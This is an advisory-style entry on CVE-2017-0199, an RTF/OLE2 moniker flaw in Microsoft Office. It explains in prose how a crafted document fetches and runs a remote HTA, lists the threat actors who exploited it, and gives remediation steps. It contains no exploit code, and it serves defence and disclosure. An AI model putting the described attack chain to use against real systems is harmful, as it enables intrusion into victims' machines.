CVE-2017-0199

What Is Microsoft Office?

Microsoft Office is the world's dominant productivity suite, running on hundreds of millions of desktops in corporate, government, and personal environments. Office's deep integration with Windows — including the ability to embed linked objects (OLE) from external sources — makes it a high-value target for attackers. The RTF (Rich Text Format) and OLE (Object Linking and Embedding) components of Office have been a recurring source of remote code execution vulnerabilities, as they parse complex binary formats and can automatically fetch and process external content.

Overview

CVE-2017-0199 is a remote code execution vulnerability in Microsoft Office and WordPad that was actively exploited as a zero-day before Microsoft patched it on April 11, 2017. The vulnerability allows an attacker to embed a malicious OLE2 link (using a Windows moniker) inside an RTF document; when Office opens the file, it automatically fetches and executes an HTML Application (HTA) file from an attacker-controlled server — achieving code execution with no additional user interaction beyond opening the document. Discovered in active exploitation by McAfee and FireEye on April 7, 2017, CVE-2017-0199 was immediately adopted by multiple nation-state groups and cybercriminal actors. CISA added it to the KEV catalog in November 2021 as one of the most significant Office vulnerabilities in history.

Affected Versions

Technical Details

Root Cause: OLE2 Link Execution via Windows Moniker

CVE-2017-0199 exploits the Windows OLE (Object Linking and Embedding) mechanism, specifically the ability to embed linked objects that point to external sources using Windows monikers. The attack works as follows:

1. Crafted RTF document: The attacker creates an RTF file containing an \objlink OLE2 control with a packager.dll or objautlink moniker pointing to an attacker-controlled HTA (HTML Application) URL
2. Automatic fetch: When Office opens the RTF, it automatically resolves the moniker link and fetches the remote HTA file over HTTP without user prompting — this is the design flaw
3. HTA execution: The fetched HTA is executed by the Windows Script Host (mshta.exe), which can run arbitrary VBScript or JScript with full user-level access
4. No macro warning: The attack bypasses Office's macro security controls entirely — no yellow "Enable Content" warning appears because no macros are involved

Why this was particularly dangerous:

• The attack required only that a user open a document — no "Enable Content" prompt, no macro warning
• The payload is fetched live from the attacker's server, making static AV detection difficult
• HTA execution provides full scripting capability: download and run executables, enumerate the system, establish C2
• The CVSS AV:L reflects file-delivery, but the practical attack chain is phishing email → user opens attachment → immediate code execution

Attack Characteristics

Discovery

Ryan Hanson of OPTIV discovered CVE-2017-0199 in mid-2016 and reported it to Microsoft. Microsoft was still developing a patch when McAfee and FireEye discovered active exploitation in the wild in early April 2017 — approximately one week before the April 11 Patch Tuesday. Microsoft accelerated the patch to include it in the April 2017 security update. The public disclosure and patch release triggered immediate mass adoption by both criminal and nation-state actors who reverse-engineered the fix.

Exploitation Context

• Zero-day exploitation before patch: Multiple threat actors exploited CVE-2017-0199 before the April 2017 patch — FireEye observed a Russian-speaking group delivering the LATENTBOT payload, while other actors targeted financial organizations; the zero-day window was approximately 9+ months from OPTIV's discovery
• Carbanak/FIN7 deployment: The financially-motivated Carbanak/FIN7 group used CVE-2017-0199 to deliver malware against financial institutions and hospitality companies, delivering their custom backdoor tooling via booby-trapped Word documents sent to employees
• APT32 (OceanLotus): The Vietnamese state-sponsored group APT32 adopted CVE-2017-0199 for targeted espionage campaigns in Southeast Asia using lure documents themed around Vietnamese news topics
• Dridex banking trojan delivery: Cybercriminal groups incorporated CVE-2017-0199 into Dridex distribution campaigns, leading to CISA's ransomwareUse: true classification as Dridex infections frequently cascaded into BitPaymer and other ransomware deployments
• Rapid commoditization: Within days of the patch, public exploit code appeared and all major exploit kits (RIG, Necurs spam botnet) began distributing CVE-2017-0199 payloads, making it one of the fastest-commoditized zero-days of 2017
• CISA KEV (2021): Added November 3, 2021 — one of the initial KEV entries, reflecting its enduring relevance as unpatched Office installations continued to be targeted years after the 2017 patch

Remediation

1. Apply April 2017 Office security update — install the April 11, 2017 security update for all Microsoft Office versions (2007, 2010, 2013, 2016) and WordPad. This is critical.

2. Enable Office Protected View — ensure Protected View is enabled in Office Trust Center settings for files from the internet and email attachments; this prevents automatic moniker resolution in untrusted documents.

3. Disable automatic link updates — configure Office to not automatically update linked objects:

   • File → Options → Advanced → General → uncheck "Update automatic links at open"

4. Block HTA execution — use AppLocker or Windows Defender Application Control (WDAC) to block execution of mshta.exe, preventing HTA payload execution even if the exploit fires.

5. Enable Attack Surface Reduction rules — the ASR rule "Block Office applications from creating child processes" prevents Word and Excel from spawning mshta.exe, cmd.exe, and other shells used by CVE-2017-0199 payloads.

6. Block outbound HTTP from Office processes — network-level egress filtering that blocks Office applications from making outbound HTTP/S connections prevents the moniker fetch from retrieving the HTA payload.